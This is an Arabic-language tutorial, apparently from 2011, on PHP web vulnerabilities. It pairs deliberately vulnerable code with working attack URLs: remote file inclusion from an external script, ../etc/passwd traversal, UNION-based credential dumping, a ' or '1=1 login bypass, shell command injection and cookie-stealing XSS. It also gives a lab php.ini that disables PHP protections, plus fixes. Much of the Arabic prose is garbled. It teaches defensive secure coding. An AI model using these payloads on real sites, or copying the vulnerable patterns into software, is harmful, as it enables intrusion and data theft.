
http://www.the-code.

tk

 
 

 
2012   

(Adel SBM)

www.the-code.tk

Adel SBM : #$%&

http://www.the-code.tk

$' * ')( +,

6  5; 8, -$)./ 1 23.1 -45) 6)7 8


>15/71
>G$G -H5) DF D , $A 2B ?8( 1
.. D'5 D7 I/ J$
.M/, DH 23 F/

:
Bek4ever-ahmed.bak-THe Don :
   

:*+ ,-  
Indoushka Over-X - Ayme NDz

:*:;http://www.noor7.com/
http://www.4algeria.com/vb
http://www.sa-hacker.com/vb/
http://www.gaza-hacker.com/cc

NJ.
2011/10/23

http://www.the-code.tk

:FP
>1DG1 (
F;R3 2 T( 1
:(D$7, #/1  D )Remote File Inclusion V (2
2 1 -- 1-2
DG1 1 -- 2-2
-$H> $P$ -- 3-2
:(2/R1 #/1 6$)R&/H/# )Local File Disclosure/Download V (3
2 1 -- 1-3
DG1 1 -- 2-3
-$H> $P$ -- 3-3
:(3$l D5H (G') SQL Injection V (4
2 1 -- 1-4
DG1 1 -- 2-4
(5pD 6$.+& .& ) SQL Injection Login Bypass-- 3-4
-$H> $P$ -- 4-4
:(1T 8$Pv&) Remote Command Execution V (5
2 1 -- 1-5
DG1 1 -- 2-5
-$H> $P$ -- 3-5
:(JAVA SCRIPT HTML 5( G') Cross-Site Scripting V (6
2 1 -- 1-6
-$H> $P$ -- 2-6
(3$l D5H )> F) P/) H 6$)R&) Download Backups+ INC files V (7
>/1+ -- 1-7
-$H> $P$ -- 2-7
:(>)R -H51 (1) 5' >/1( 8
>)&p (

http://www.the-code.tk

:>1DG1
$ > ( -)+3 1 PHP >.1l 53  ) >/)R  (1 vv?)& 2p )H5-
).
' 2B ?P3 ($8 ). ') 3 6?B I  )F1  F53 F.1,B.
 FB 5 7 1 ,...D$G7
2B? (1 $) 3&51 P -H?F ; D v ?$ 1( )AB ($ 28). ?R # )15/7 p> )$B /7 , lB PHP ?P5 ,
 .5/   >G.
(1 DB & D.v+ & /)D+ (1' #?& 2? D & 6+.
2B 2v3T8 ? % >$P$  ..F
5?$  >/1%, 15D1 >$ . 1 53 >1DG1 >/1

http://www.the-code.tk

F;R3 2 T( 1
7 1 M$l& MySQL PHP D 13, M$l& 5 IT 5A 8 2B v1 5/)
.3JF; I/ LOCALHOST (2/R) A )2/R) B+,
D7 7, ;. M$l D7, )6$l I/ APPSERVE WAMP 13, M$l& v?)
I R& / T php.ini (5? #/1 6D7,  2/R) A I/ >$+l
.$R 6?, FG$l 
: 2/ ) 5?& $R, FD php.ini #/1 2B >$ 15/7) ( R,

; Lab-only settings: each value below switches a PHP protection off (or a risky
; feature on) so the vulnerable examples in this document behave as described.
; Presumably meant for the local test install the text mentions - never apply
; them to a server that is reachable by anyone else.
; safe_mode, register_globals and magic_quotes_gpc were removed in PHP 5.4, so
; those three lines only have an effect on older interpreters.
safe_mode = off
register_globals = on
; Lets include/require load code from a URL; this is the precondition for the
; remote file inclusion examples. The PHP default is off.
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
; NOTE(review): PHP spells this directive short_open_tag; "short_tag_open" as
; printed is presumably a typo - confirm against the original document.
short_tag_open = on
; Sends error text (file paths, SQL fragments) to the client; outside a lab,
; log errors instead of displaying them.
display_errors = on
; NOTE(review): the PHP directive is disable_functions (takes a comma-separated
; list); "disabled_functions = N/A" as printed is presumably shorthand for
; "nothing disabled" - confirm.
disabled_functions = N/A
1, #/A1 6lH (1 F1DA 3$, DH 3 : >$& 5A l& . 6D7 D7,
. ,?+, 7 1 PHP
.P)> 5, lp, H -5 D1 > 2B D,> P/A1 ,? MlV $3V
http://www.the-code.tk/code.php?id=96 :v D.& APPSERVE WAMP 13, 6$)R& ,
!!! 5' $  3... ,?+ 8 > 2vv?) #$ : 6N+& M3 .F..D$    I /v3 $ /G&  5H

http://www.the-code.tk

:(D$7, #/1  D )Remote File Inclusion V (2


 5?& 1 l 2> $;p P/1 D( 1 v?)& F3 $R, D; 4  8
.;F)/ >l+v, p ,?
.F$( $.1l)( P  3 $' Fv?  p( 1 l7& F3 ) : 2  DR& DH 2 #/) D> $/) ;&  Fv?)  V D;5& PHP > 2B
require require()
require_once
include
include_once
: 5 ( 2 1 -- 1-2
:2 5? 5R test.php #/1 vD  Pv --

<?php
// Deliberately vulnerable demo (test.php in the surrounding text).
// Source: the 'pagina' query parameter is copied from the request unchanged.
$pagina=$_GET['pagina'];
// Sink: include loads and executes whatever $pagina names, so the caller
// chooses the code that runs. With allow_url_include = on (as in the lab
// php.ini above) the value may also be a URL.
// Mitigation: never pass request data to include/require; map the parameter
// onto a fixed allow-list of local files and keep allow_url_include off.
include $pagina;
?>
5? )N PHP > 2B $) $pagina $) 2D+& include >D. p, 5? v
(PHP $ 7, I -;& 2p $/) $ D J1, H5l+1
http://127.0.0.1/test.php M33 P), RP& #/) -B, v)H : >RP 2B p D 5;' v
:(WAMP p 6)7 3 )%A 8 61

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2


.include >D/ >l+v, B71 $ 5F.1 J $pagina $) 5 %A lp M,? 6/ , 5?& 2( R3 DR3 >)$H $) 273 1Dv 5? 
:6? 8F, P)> 5, 8 5?

http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt?
-4 F)( 1  TXT 23 #/1 >$, 5? . D & 8 6 I+v&
. ,> F3 2B FP> 1
,> F3 2B 00  FP> 1 -4 . )5/N+ $?

http://www.the-code.tk

: )8 p (1 FP? >,;-

<?php
// Variant of the previous demo: same tainted source, with a fixed suffix added.
$pagina=$_GET['pagina'];
// Appending '.php' is not validation: the directory (and, when URL includes
// are enabled, the host) part of the path is still chosen by the caller.
// Mitigation: resolve the parameter against an allow-list of known page names
// instead of building a path from it.
include $pagina.'.php';
?>
: (FP> 1 -4 D,) 6 v$D -http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt
http://the-code.tk/evilscript.txt.php v 6)$ D T .v (
B4 51 6.&  2? , D7,  FP> 1 00 #$3 5 8
.6 F$ ,> $/) .v 2, ID+) $) D7, 5?& 2

: 5 ( DG1 1 -- 2-2


.M,? (1 1
:(index.php #/1) )5?( 1 #G1 -

// Excerpt (index.php per the surrounding text). $main_content is taken from
// the request when the parameter is present, otherwise from the session.
// $_REQUEST merges GET, POST and cookie data, so any of them can supply it.
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
// Sink: the request-controlled value reaches require_once with no check in the
// visible lines, so the caller decides which file is loaded and executed.
// NOTE(review): code elided by "etc" above may alter $main_content - confirm.
// Mitigation: select the file from a server-side allow-list keyed by the
// parameter rather than using the parameter as a path.
require_once($main_content);
>)$H /$ 15) ;F)" main_content" $)> 5, 6 2D+3  vv?)
REQUEST / > 6P, $)/ DR
http://127.0.0.1/index.php?main_content=http://the-code.tk/evilscript.txt?

:2& 5?$ 

..v, 6 D $ 2,


6G3 55&, " HTTPS" DA .3 " )?( HTTP" 6lG& 5v 7, :>'1
"FTP"P/)

http://www.the-code.tk

:-$H> $P$ 3-2


.$) 2B "/" 61 17 51 DA, )+& - : >$+, 
.>B71 $) 6 67.&  ' pT ( R,-

#/1 6$)R&/H/# )Local File Inclusion/Download V (3


:(2/R1
.F/$)R& I' DF+) -H5) P/1 5R1 H v?) 8 p (1 3B >+, 6?,
: P/) G,  )+& 2 D 7,
file_get_contents : 61 #/1 H
readfile :#/1 H
file : >B5P1 2B 1 61 #/1 H
fopen : , #/1 B
highlight_file() - show_source : #/)> RP 5-5R1/5 

: 5 ( 2 1 -- 1-3


:2 5? 5R test.php #/1 vD  Pv --

<?php
// Deliberately vulnerable demo (test.php in the surrounding text).
// Source: the 'pagina' query parameter, copied from the request unchanged.
$pagina=$_GET['pagina'];
// Sink: readfile() writes the named file to the response. The file is not
// executed, but any file the PHP process can read (configuration files with
// database credentials, for instance) can be disclosed this way.
// Mitigation: resolve the path with realpath() and serve it only if it lies
// inside the one directory intended for download; better, look files up by id.
readfile($pagina);
?>
$pagina $), DR) #/) 5R1 H readfile >D R . p, 5? v
R$ R> 7$l, A) &H )#/) +1 DDR, 5Gv 2B 2,
Dv) >l+v, config.php #/1 61 p 15/71 5R& 2)> F) P/) H
: vBulletin
:6? 8F, 5?$ 

http://127.0.0.1/test.php?pagina=../../../../../etc/passwd
..A( 1 D $  G/ #/) / $ 2,
. M,?+ 35?1 +' $ &H )#/) +1 2 ../../../../../etc/passwd

http://www.the-code.tk

: 5 ( DG1 1 -- 2-3


download.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

// Excerpt (download.php per the surrounding text).
// The path is the document root concatenated with the 'file' request
// parameter. The fixed prefix does not confine the result: "../" segments in
// the parameter still walk out of the document root.
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];


header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
// basename() is applied only to the file name offered to the browser; the
// path that is actually read below is still the full, unchecked $file.
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
// Sink: streams the file to the client. The @ operator suppresses readfile()
// errors, so failed or unexpected reads leave no PHP warning to notice.
// Mitigation: canonicalise with realpath(), require the result to start with
// the intended download directory, and reject everything else.
@readfile($file);
die();
2B F 8 .$ _REQUEST >5, l/ &( 1 $ 5 5/) #/) ( l7 $file $)
.T +
.#/) 5R1 3  vv?) readfile () >D ( 
: 2 5? 2,
http://127.0.0.1/download.php?file=../../../../../../etc/passwd
..v, 5/) #/) H (1 (?)3 I'

:-$H> $P$ 3-3


.$) 2B "/" 61 17 51 DA, )+& - : >$+, 
.>B71 $) 6 67.&  ' pT ( R,.

http://www.the-code.tk

:(3$l D5H (G') SQL Injection V (4


FT F3>  ) $'3 (1 7T l7&  3 T 2 SQL Injection V
D. DDR& (1 >D, F& 2B $HD> HD, F' , R+& D'5 8
-B( 1 v?)& 2> 1DG) 6' )V (1  3$l A I 5> ,) D)T
.6
: 5 ( 2 1 -- 1-4
test.php #/1 (1 (1 #G1 --

<?php
// Deliberately vulnerable demo (test.php in the surrounding text).
// Source: the 'id' query parameter, copied from the request unchanged.
$id = $_GET['id'];
// Sink: $id is interpolated into the SQL text, so a quote character in the
// parameter ends the string literal and the rest is parsed as SQL.
// Mitigation: use a prepared statement with a bound parameter (PDO or mysqli).
// The mysql_* functions used here were removed in PHP 7.0.
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
D3 2 SQL 1( GR3  )?( v3 2v7 8 /P1 $ $id $) B '3 )
/P1 $, DH 81 6N+& DH
1H $> P/A1 51 SQL 1 5? )?( vGR3 8 5? 2 /P( 1 /P1 $.3$l DG ;5& 1 6)& D, 51 8 GB
: p, 5; ( #?> $P$ 1 8 ' D ' J1 2B 6)& >)$H $id $)  5 $/1 6> 5F+ > 2B 1T
:6? 8F, 5? )?( 8 %A  F+& 2 3$l DH 2B /p l+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'ORDER BY `date` DESC' at line 1
.p $ D F %A >
:2/ ) 5?>  $P$ I 573http://127.0.0.1/test.php?id=1+union+all+select+1,2,version(),4-.(3 H 5)7 2B >, )3$l DH D I/ 6Rv v

http://www.the-code.tk

: 5 ( DG1 1 -- 2-4


listing_view.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

// Excerpt (listing_view.php per the surrounding text); the if block opened on
// the last line is closed outside this excerpt.
// Source: the 'itemnr' query parameter, copied from the request unchanged.
$id = $_GET['itemnr'];
// $home is defined outside this excerpt.
require_once($home."mysqlinfo.php");
// Sink: $id is placed in the query as an unquoted value, so no quote character
// is even needed for the parameter to be parsed as SQL.
// Mitigation: bind it as a parameter of a prepared statement; for a numeric id
// an (int) cast before use is the minimum.
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals
where id=$id";
$result = mysql_query($query);
// NOTE(review): $result is not checked for false before mysql_num_rows().
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
. /P1 $ Fl/v 2)> $G itemnr /> 5, $id $))> $H D,DR& $ 3' 3
: 2&T>  5F 6?, SQL ( G' (1 (?)v 2,
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,
3,concat(0x3a,email,password),5,6,7,8,9,10+from+users-.($1DA+) D.( 1 )> )/ 23 ?Dl I/ 6Rv
6)) 6$P, F' 2vv?) 8 DG( 1 2 SQL Injection :>1> '1
/P 2A& (1 6$P& 6 6)$  8 5' 1 , D% * 
.6 -B I 5 15/7) A I
:(5pD 6$.+& .& ) SQL Injection Login Bypass --3-4

SQL V (1 J. FPv 8 F+l   6); #p( 1 l7& 8
' or ' 1=1 J1) 7+1 '> 5 I 5pD( 1 v?)& 2 Injection
: )I/ J
login.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

// Excerpt (login.php per the surrounding text).
// Source: the submitted user name, copied from the request unchanged.
$postbruger = $_POST['username'];
// The password is hashed before use, so its value cannot break the SQL string;
// the user name above gets no such treatment. Unsalted MD5 is also unsuitable
// for password storage - use password_hash()/password_verify().
$postpass = md5($_POST['password']);
// Sink: $postbruger is interpolated inside quotes in the WHERE clause, so the
// login decision depends on SQL text the client can shape.
// On failure the raw mysql_error() text is sent to the client, which exposes
// query details. $tablestart is defined outside this excerpt.
// Mitigation: prepared statement with bound parameters; log database errors
// server-side and show a generic message.
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND
password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");

http://www.the-code.tk

: >$ 15/7) -4 .), 5pD'> 5 .& vv?)


: DA+)
: +)> /

admin ' or ' 1=1


jocker

>+l 8F, SQL DAv 6 v5p 6.+$ #$ 5Gv v3 D$


: l+ 7v SQL (  1 l$ 8 1T v' 5 v3T 73 2> ,;

// Illustration of the login query after the submitted values have been
// interpolated: the quote inside the user-name value closes the string literal
// early, so the WHERE clause is no longer the comparison the author wrote.
// With bound parameters the same input would stay a plain string value.
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND
password = ' jocker'")
8 1T( &;)> 1 (?)& 2? 3$l D5H -1 617> G ( ?B D 5?& . .DF  5? . 5pD  /7 -1 5pD( 1 v?)& SQL , vDp
: -$H> $P$ 4-4
: )8 1 DA, 1H GB F/7; $) 2B R/ )+& $id=(int)$_GET['id'];
: 3$l DG /p DR& 2> A R -v), H -,.()'"_+/*

:(1T 8$Pv&) Remote Command Execution V (5


 )+& 2 Remote file Inclusion V D7, V p 23V 2 +' #v& 8. B$+ I/ l1 1 8$Pv,

: 2 1T $l,  )+& 2 D 7, D;5& PHP > 2B-

exec
passthru
shell_exec
system
>.$3 D1 v?) 3B EXEC() >D, 1T $l& l   : >'1 -.-l& F3( 1T 8$Pv&  (? )1T

http://www.the-code.tk

: 5 ( 2 1 -- 1-5


test.php #/1 (1 #G1 --

<?php
// Deliberately vulnerable demo (test.php in the surrounding text).
// Source: the 'cmd' query parameter, copied from the request unchanged.
$cmd=$_GET['cmd'];
// Sink: system() hands the whole string to the shell and prints the output,
// so the caller runs commands with the privileges of the PHP process.
// Mitigation: do not expose command execution to request data at all; where a
// tool must be invoked, fix the command server-side and pass only validated
// arguments through escapeshellarg().
system($cmd);
?>
$cmd >R 8 2B 5 $)/ >)$H / vv?) #$ vB >G,+ >  p (1
: 2&T   67.3  vv?) v1
http://127.0.0.1/test.php?cmd=id
.>.$v F& 5( B+ I/ v&$'  1 )id 1T 8$Pv& $
7 )dir 1T Dv5 3 1( 1 1T 5?$ 2/R) B+ I/ . '> 2B
.(2R D/.) P/1
: 5 ( DG1 1 -- 2-5
dig.php : I)+ )#/) M,? (1 1
: )5?( 1 #G1 -

// Excerpt (dig.php per the surrounding text).
// Source: 'ns' and 'query_type' come from the query string unchanged.
$ns = $_GET['ns'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
// $host is not assigned in the visible lines; presumably set in the elided part.
$host = strtolower($host);
// $ns is echoed into the HTML unescaped, which is a reflected XSS sink as well.
echo("<span class=\"plainBlue\"><b>Executing : <u>dig $ns </u></b><br>");
echo '<pre>';
// Sink: the label above says "dig $ns", but the command actually executed is
// the bare value of $ns - the request parameter is the entire command line.
// Mitigation: validate $ns against a strict host-name pattern and pass it via
// escapeshellarg() as an argument to a fixed dig invocation.
system ("$ns");

$ns $) p (1 D 1 ;5 ; F)/ (?) 3 F v


: 2& 6?, ;5$ 1T
http://127.0.0.1/dig.php?ns=ls -la

:6? 8F, 5 vB 5 : >1> B4-

http://www.the-code.tk

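// Second dig example, kept as the document's vulnerable illustration; the only
// code change is the repaired string literal on the $alg line, which was
// printed without its closing quote.
// Source: both values come from the query string unchanged.
$dz = $_GET['ns'];
$alg = $_GET['alg'];
// ........................ etc ........................
// Sink: a fixed "dig" prefix does not make this safe. Both values are
// interpolated into a line that the shell parses, so shell operators inside
// them are interpreted rather than passed to dig as text.
// Mitigation: validate each value against a strict pattern and wrap each one
// in escapeshellarg() before building the command.
system ("dig @$dz $alg");
?>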

5?$ #$ 2B
:6? 8F, 5?$ :>,;

http://127.0.0.1/dig.php?dz=|| id ||&alg=ls -la


.D' MH 2B 1 D $l DA+ || J1 T

:(JAVA SCRIPT HTML 5( G') Cross-Site Scripting V (6

l 2B D.& )?( D; v1 2FB 8F F35v  8 5.1l) 6. 1 $
.>$> G, F I/ ;F) DH 2B ()?& F$7B (? >$)7 -H5)
: 2&T   67.3  vv?) v1
: 5 ( 2 1 -- 1-6
test.php #/1 (1 (1 #G1 -: )5?( 1 #G1 -

<?php
// Deliberately vulnerable demo (test.php in the surrounding text).
// Source: the 'name' query parameter, copied from the request unchanged.
$name=$_GET['name'];
// Sink: the value is written into the page without encoding, so markup in the
// parameter is rendered by the browser in the site's origin (reflected XSS).
// Mitigation: encode on output with htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
// marking session cookies HttpOnly limits what an injected script can read.
print $name;
?>
print >D> 5, l V (1 $name $)/ >)$H /  3B 5? v);& 5
:6? 8F, M,? B; 5( GR3 5  1 ....... 5? 8>  G 2B D$; ?Pv -

http://127.0.0.1/test.php?name=<script>alert(document.cookie)</script>

8 2B v, A J$5? 5 DA+) J$5 5R& B; > 8B3 5F 5? >.$v
.>R

http://www.the-code.tk

p $P& V J$5? A 5 5R ,( 5?& >$/) l & p  D' I 6 , >A J$5? 15/71 B ,/ >$R P& Dv . >$R I 
.>H+) J$5? 15/71 +1 >$R +' I 5pD, 5G $pT 8; F)

: -$H> $P$ 2-6

htmlspecialchars()
 htmlentities() >) 7 vv?) $' D; >/F -$H> G
. v HTML 5 53 >/17), 5G& D 8
:6? 8F, 5?$ -H) 5? 2,

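<?php
// Corrected form of the earlier print example (the listing was mirrored by
// right-to-left text extraction and is restored to valid PHP here).
// The isset() guard avoids the "Undefined index" notice when the parameter is
// absent. ENT_QUOTES encodes single quotes as well as double quotes, which
// matters when the value ends up inside an HTML attribute; the explicit
// charset keeps the encoding independent of the interpreter's default.
$name=htmlentities(isset($_GET['name']) ? $_GET['name'] : '', ENT_QUOTES, 'UTF-8');
print $name;
?>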

:INC files V + Download Backups V (7


: >/1+ 1-7
:$R, ($.1l)/ >;+ pT( 1 )l $A

-H5) 3$, DG >$$' +v 6$)R,  )+& : Download Backups V
.DF+)
:$+, 1
http://127.0.0.1/adminpanel/phpmydump.php

( ))?( 1 > B5?1 5?& 2 inc P/1 7, G,  )+& : INC files V
.DF+) -H5) 15/71 5R&
:(3$l DG,  &15/71 5R #/1 H) $+, 1
http://127.0.0.1/inc/mysql.inc

: -$H> G 2-7

http://www.the-code.tk

65R> $$'> A+v 6$)R& D 8 5 D)( 1 GR : Download Backups


.>$$' +v)> R 3 D; DA %p >RP I
>$, P/1 2B 15/7) P' 5 6BT .htaccess DA, P/) ')> : INC files
.PHP

:(>)R -H51 (1) 5' >/1( 8


Remote File Inclusion V (1
http://www.1337day.com/exploits/14932
Local File Disclosure/Download V (2
http://www.1337day.com/exploits/17087
SQL Injection V (3
http://www.1337day.com/exploits/17021
http://www.1337day.com/exploits/14836
http://www.1337day.com/exploits/14828
Remote Command Execution V (4
http://www.1337day.com/exploits/1503
Cross-Site Scripting V (5
http://www.1337day.com/exploits/17073

http://www.the-code.tk

:>)&p
8 6>  ?( $P$ 5A $' (1 #/A& ( 1 53 D D;5& 3 7)( 1
3 D( )1   I  ,H M 'DG 2p, N; F) DH I/ D)7
I/ p 2v1 238 ...( '1 >1DG1 >/'1 I M/) /  DF;) /
...6; J * ?)B 5+1 I/ 2N1 5Rv 5+)

5; ? 5' ?&+P'&? H&? G$/7


:23 ?Dl l 2/1
Madrido.Jocker@gmail.com
: -H5)  I;
http://www.the-code.tk
: SKYPE l 65
AdelSBM

http://www.the-code.tk

D5 2 D 5;

2011/10/23

http://www.the-code.tk

Z^] \[ 
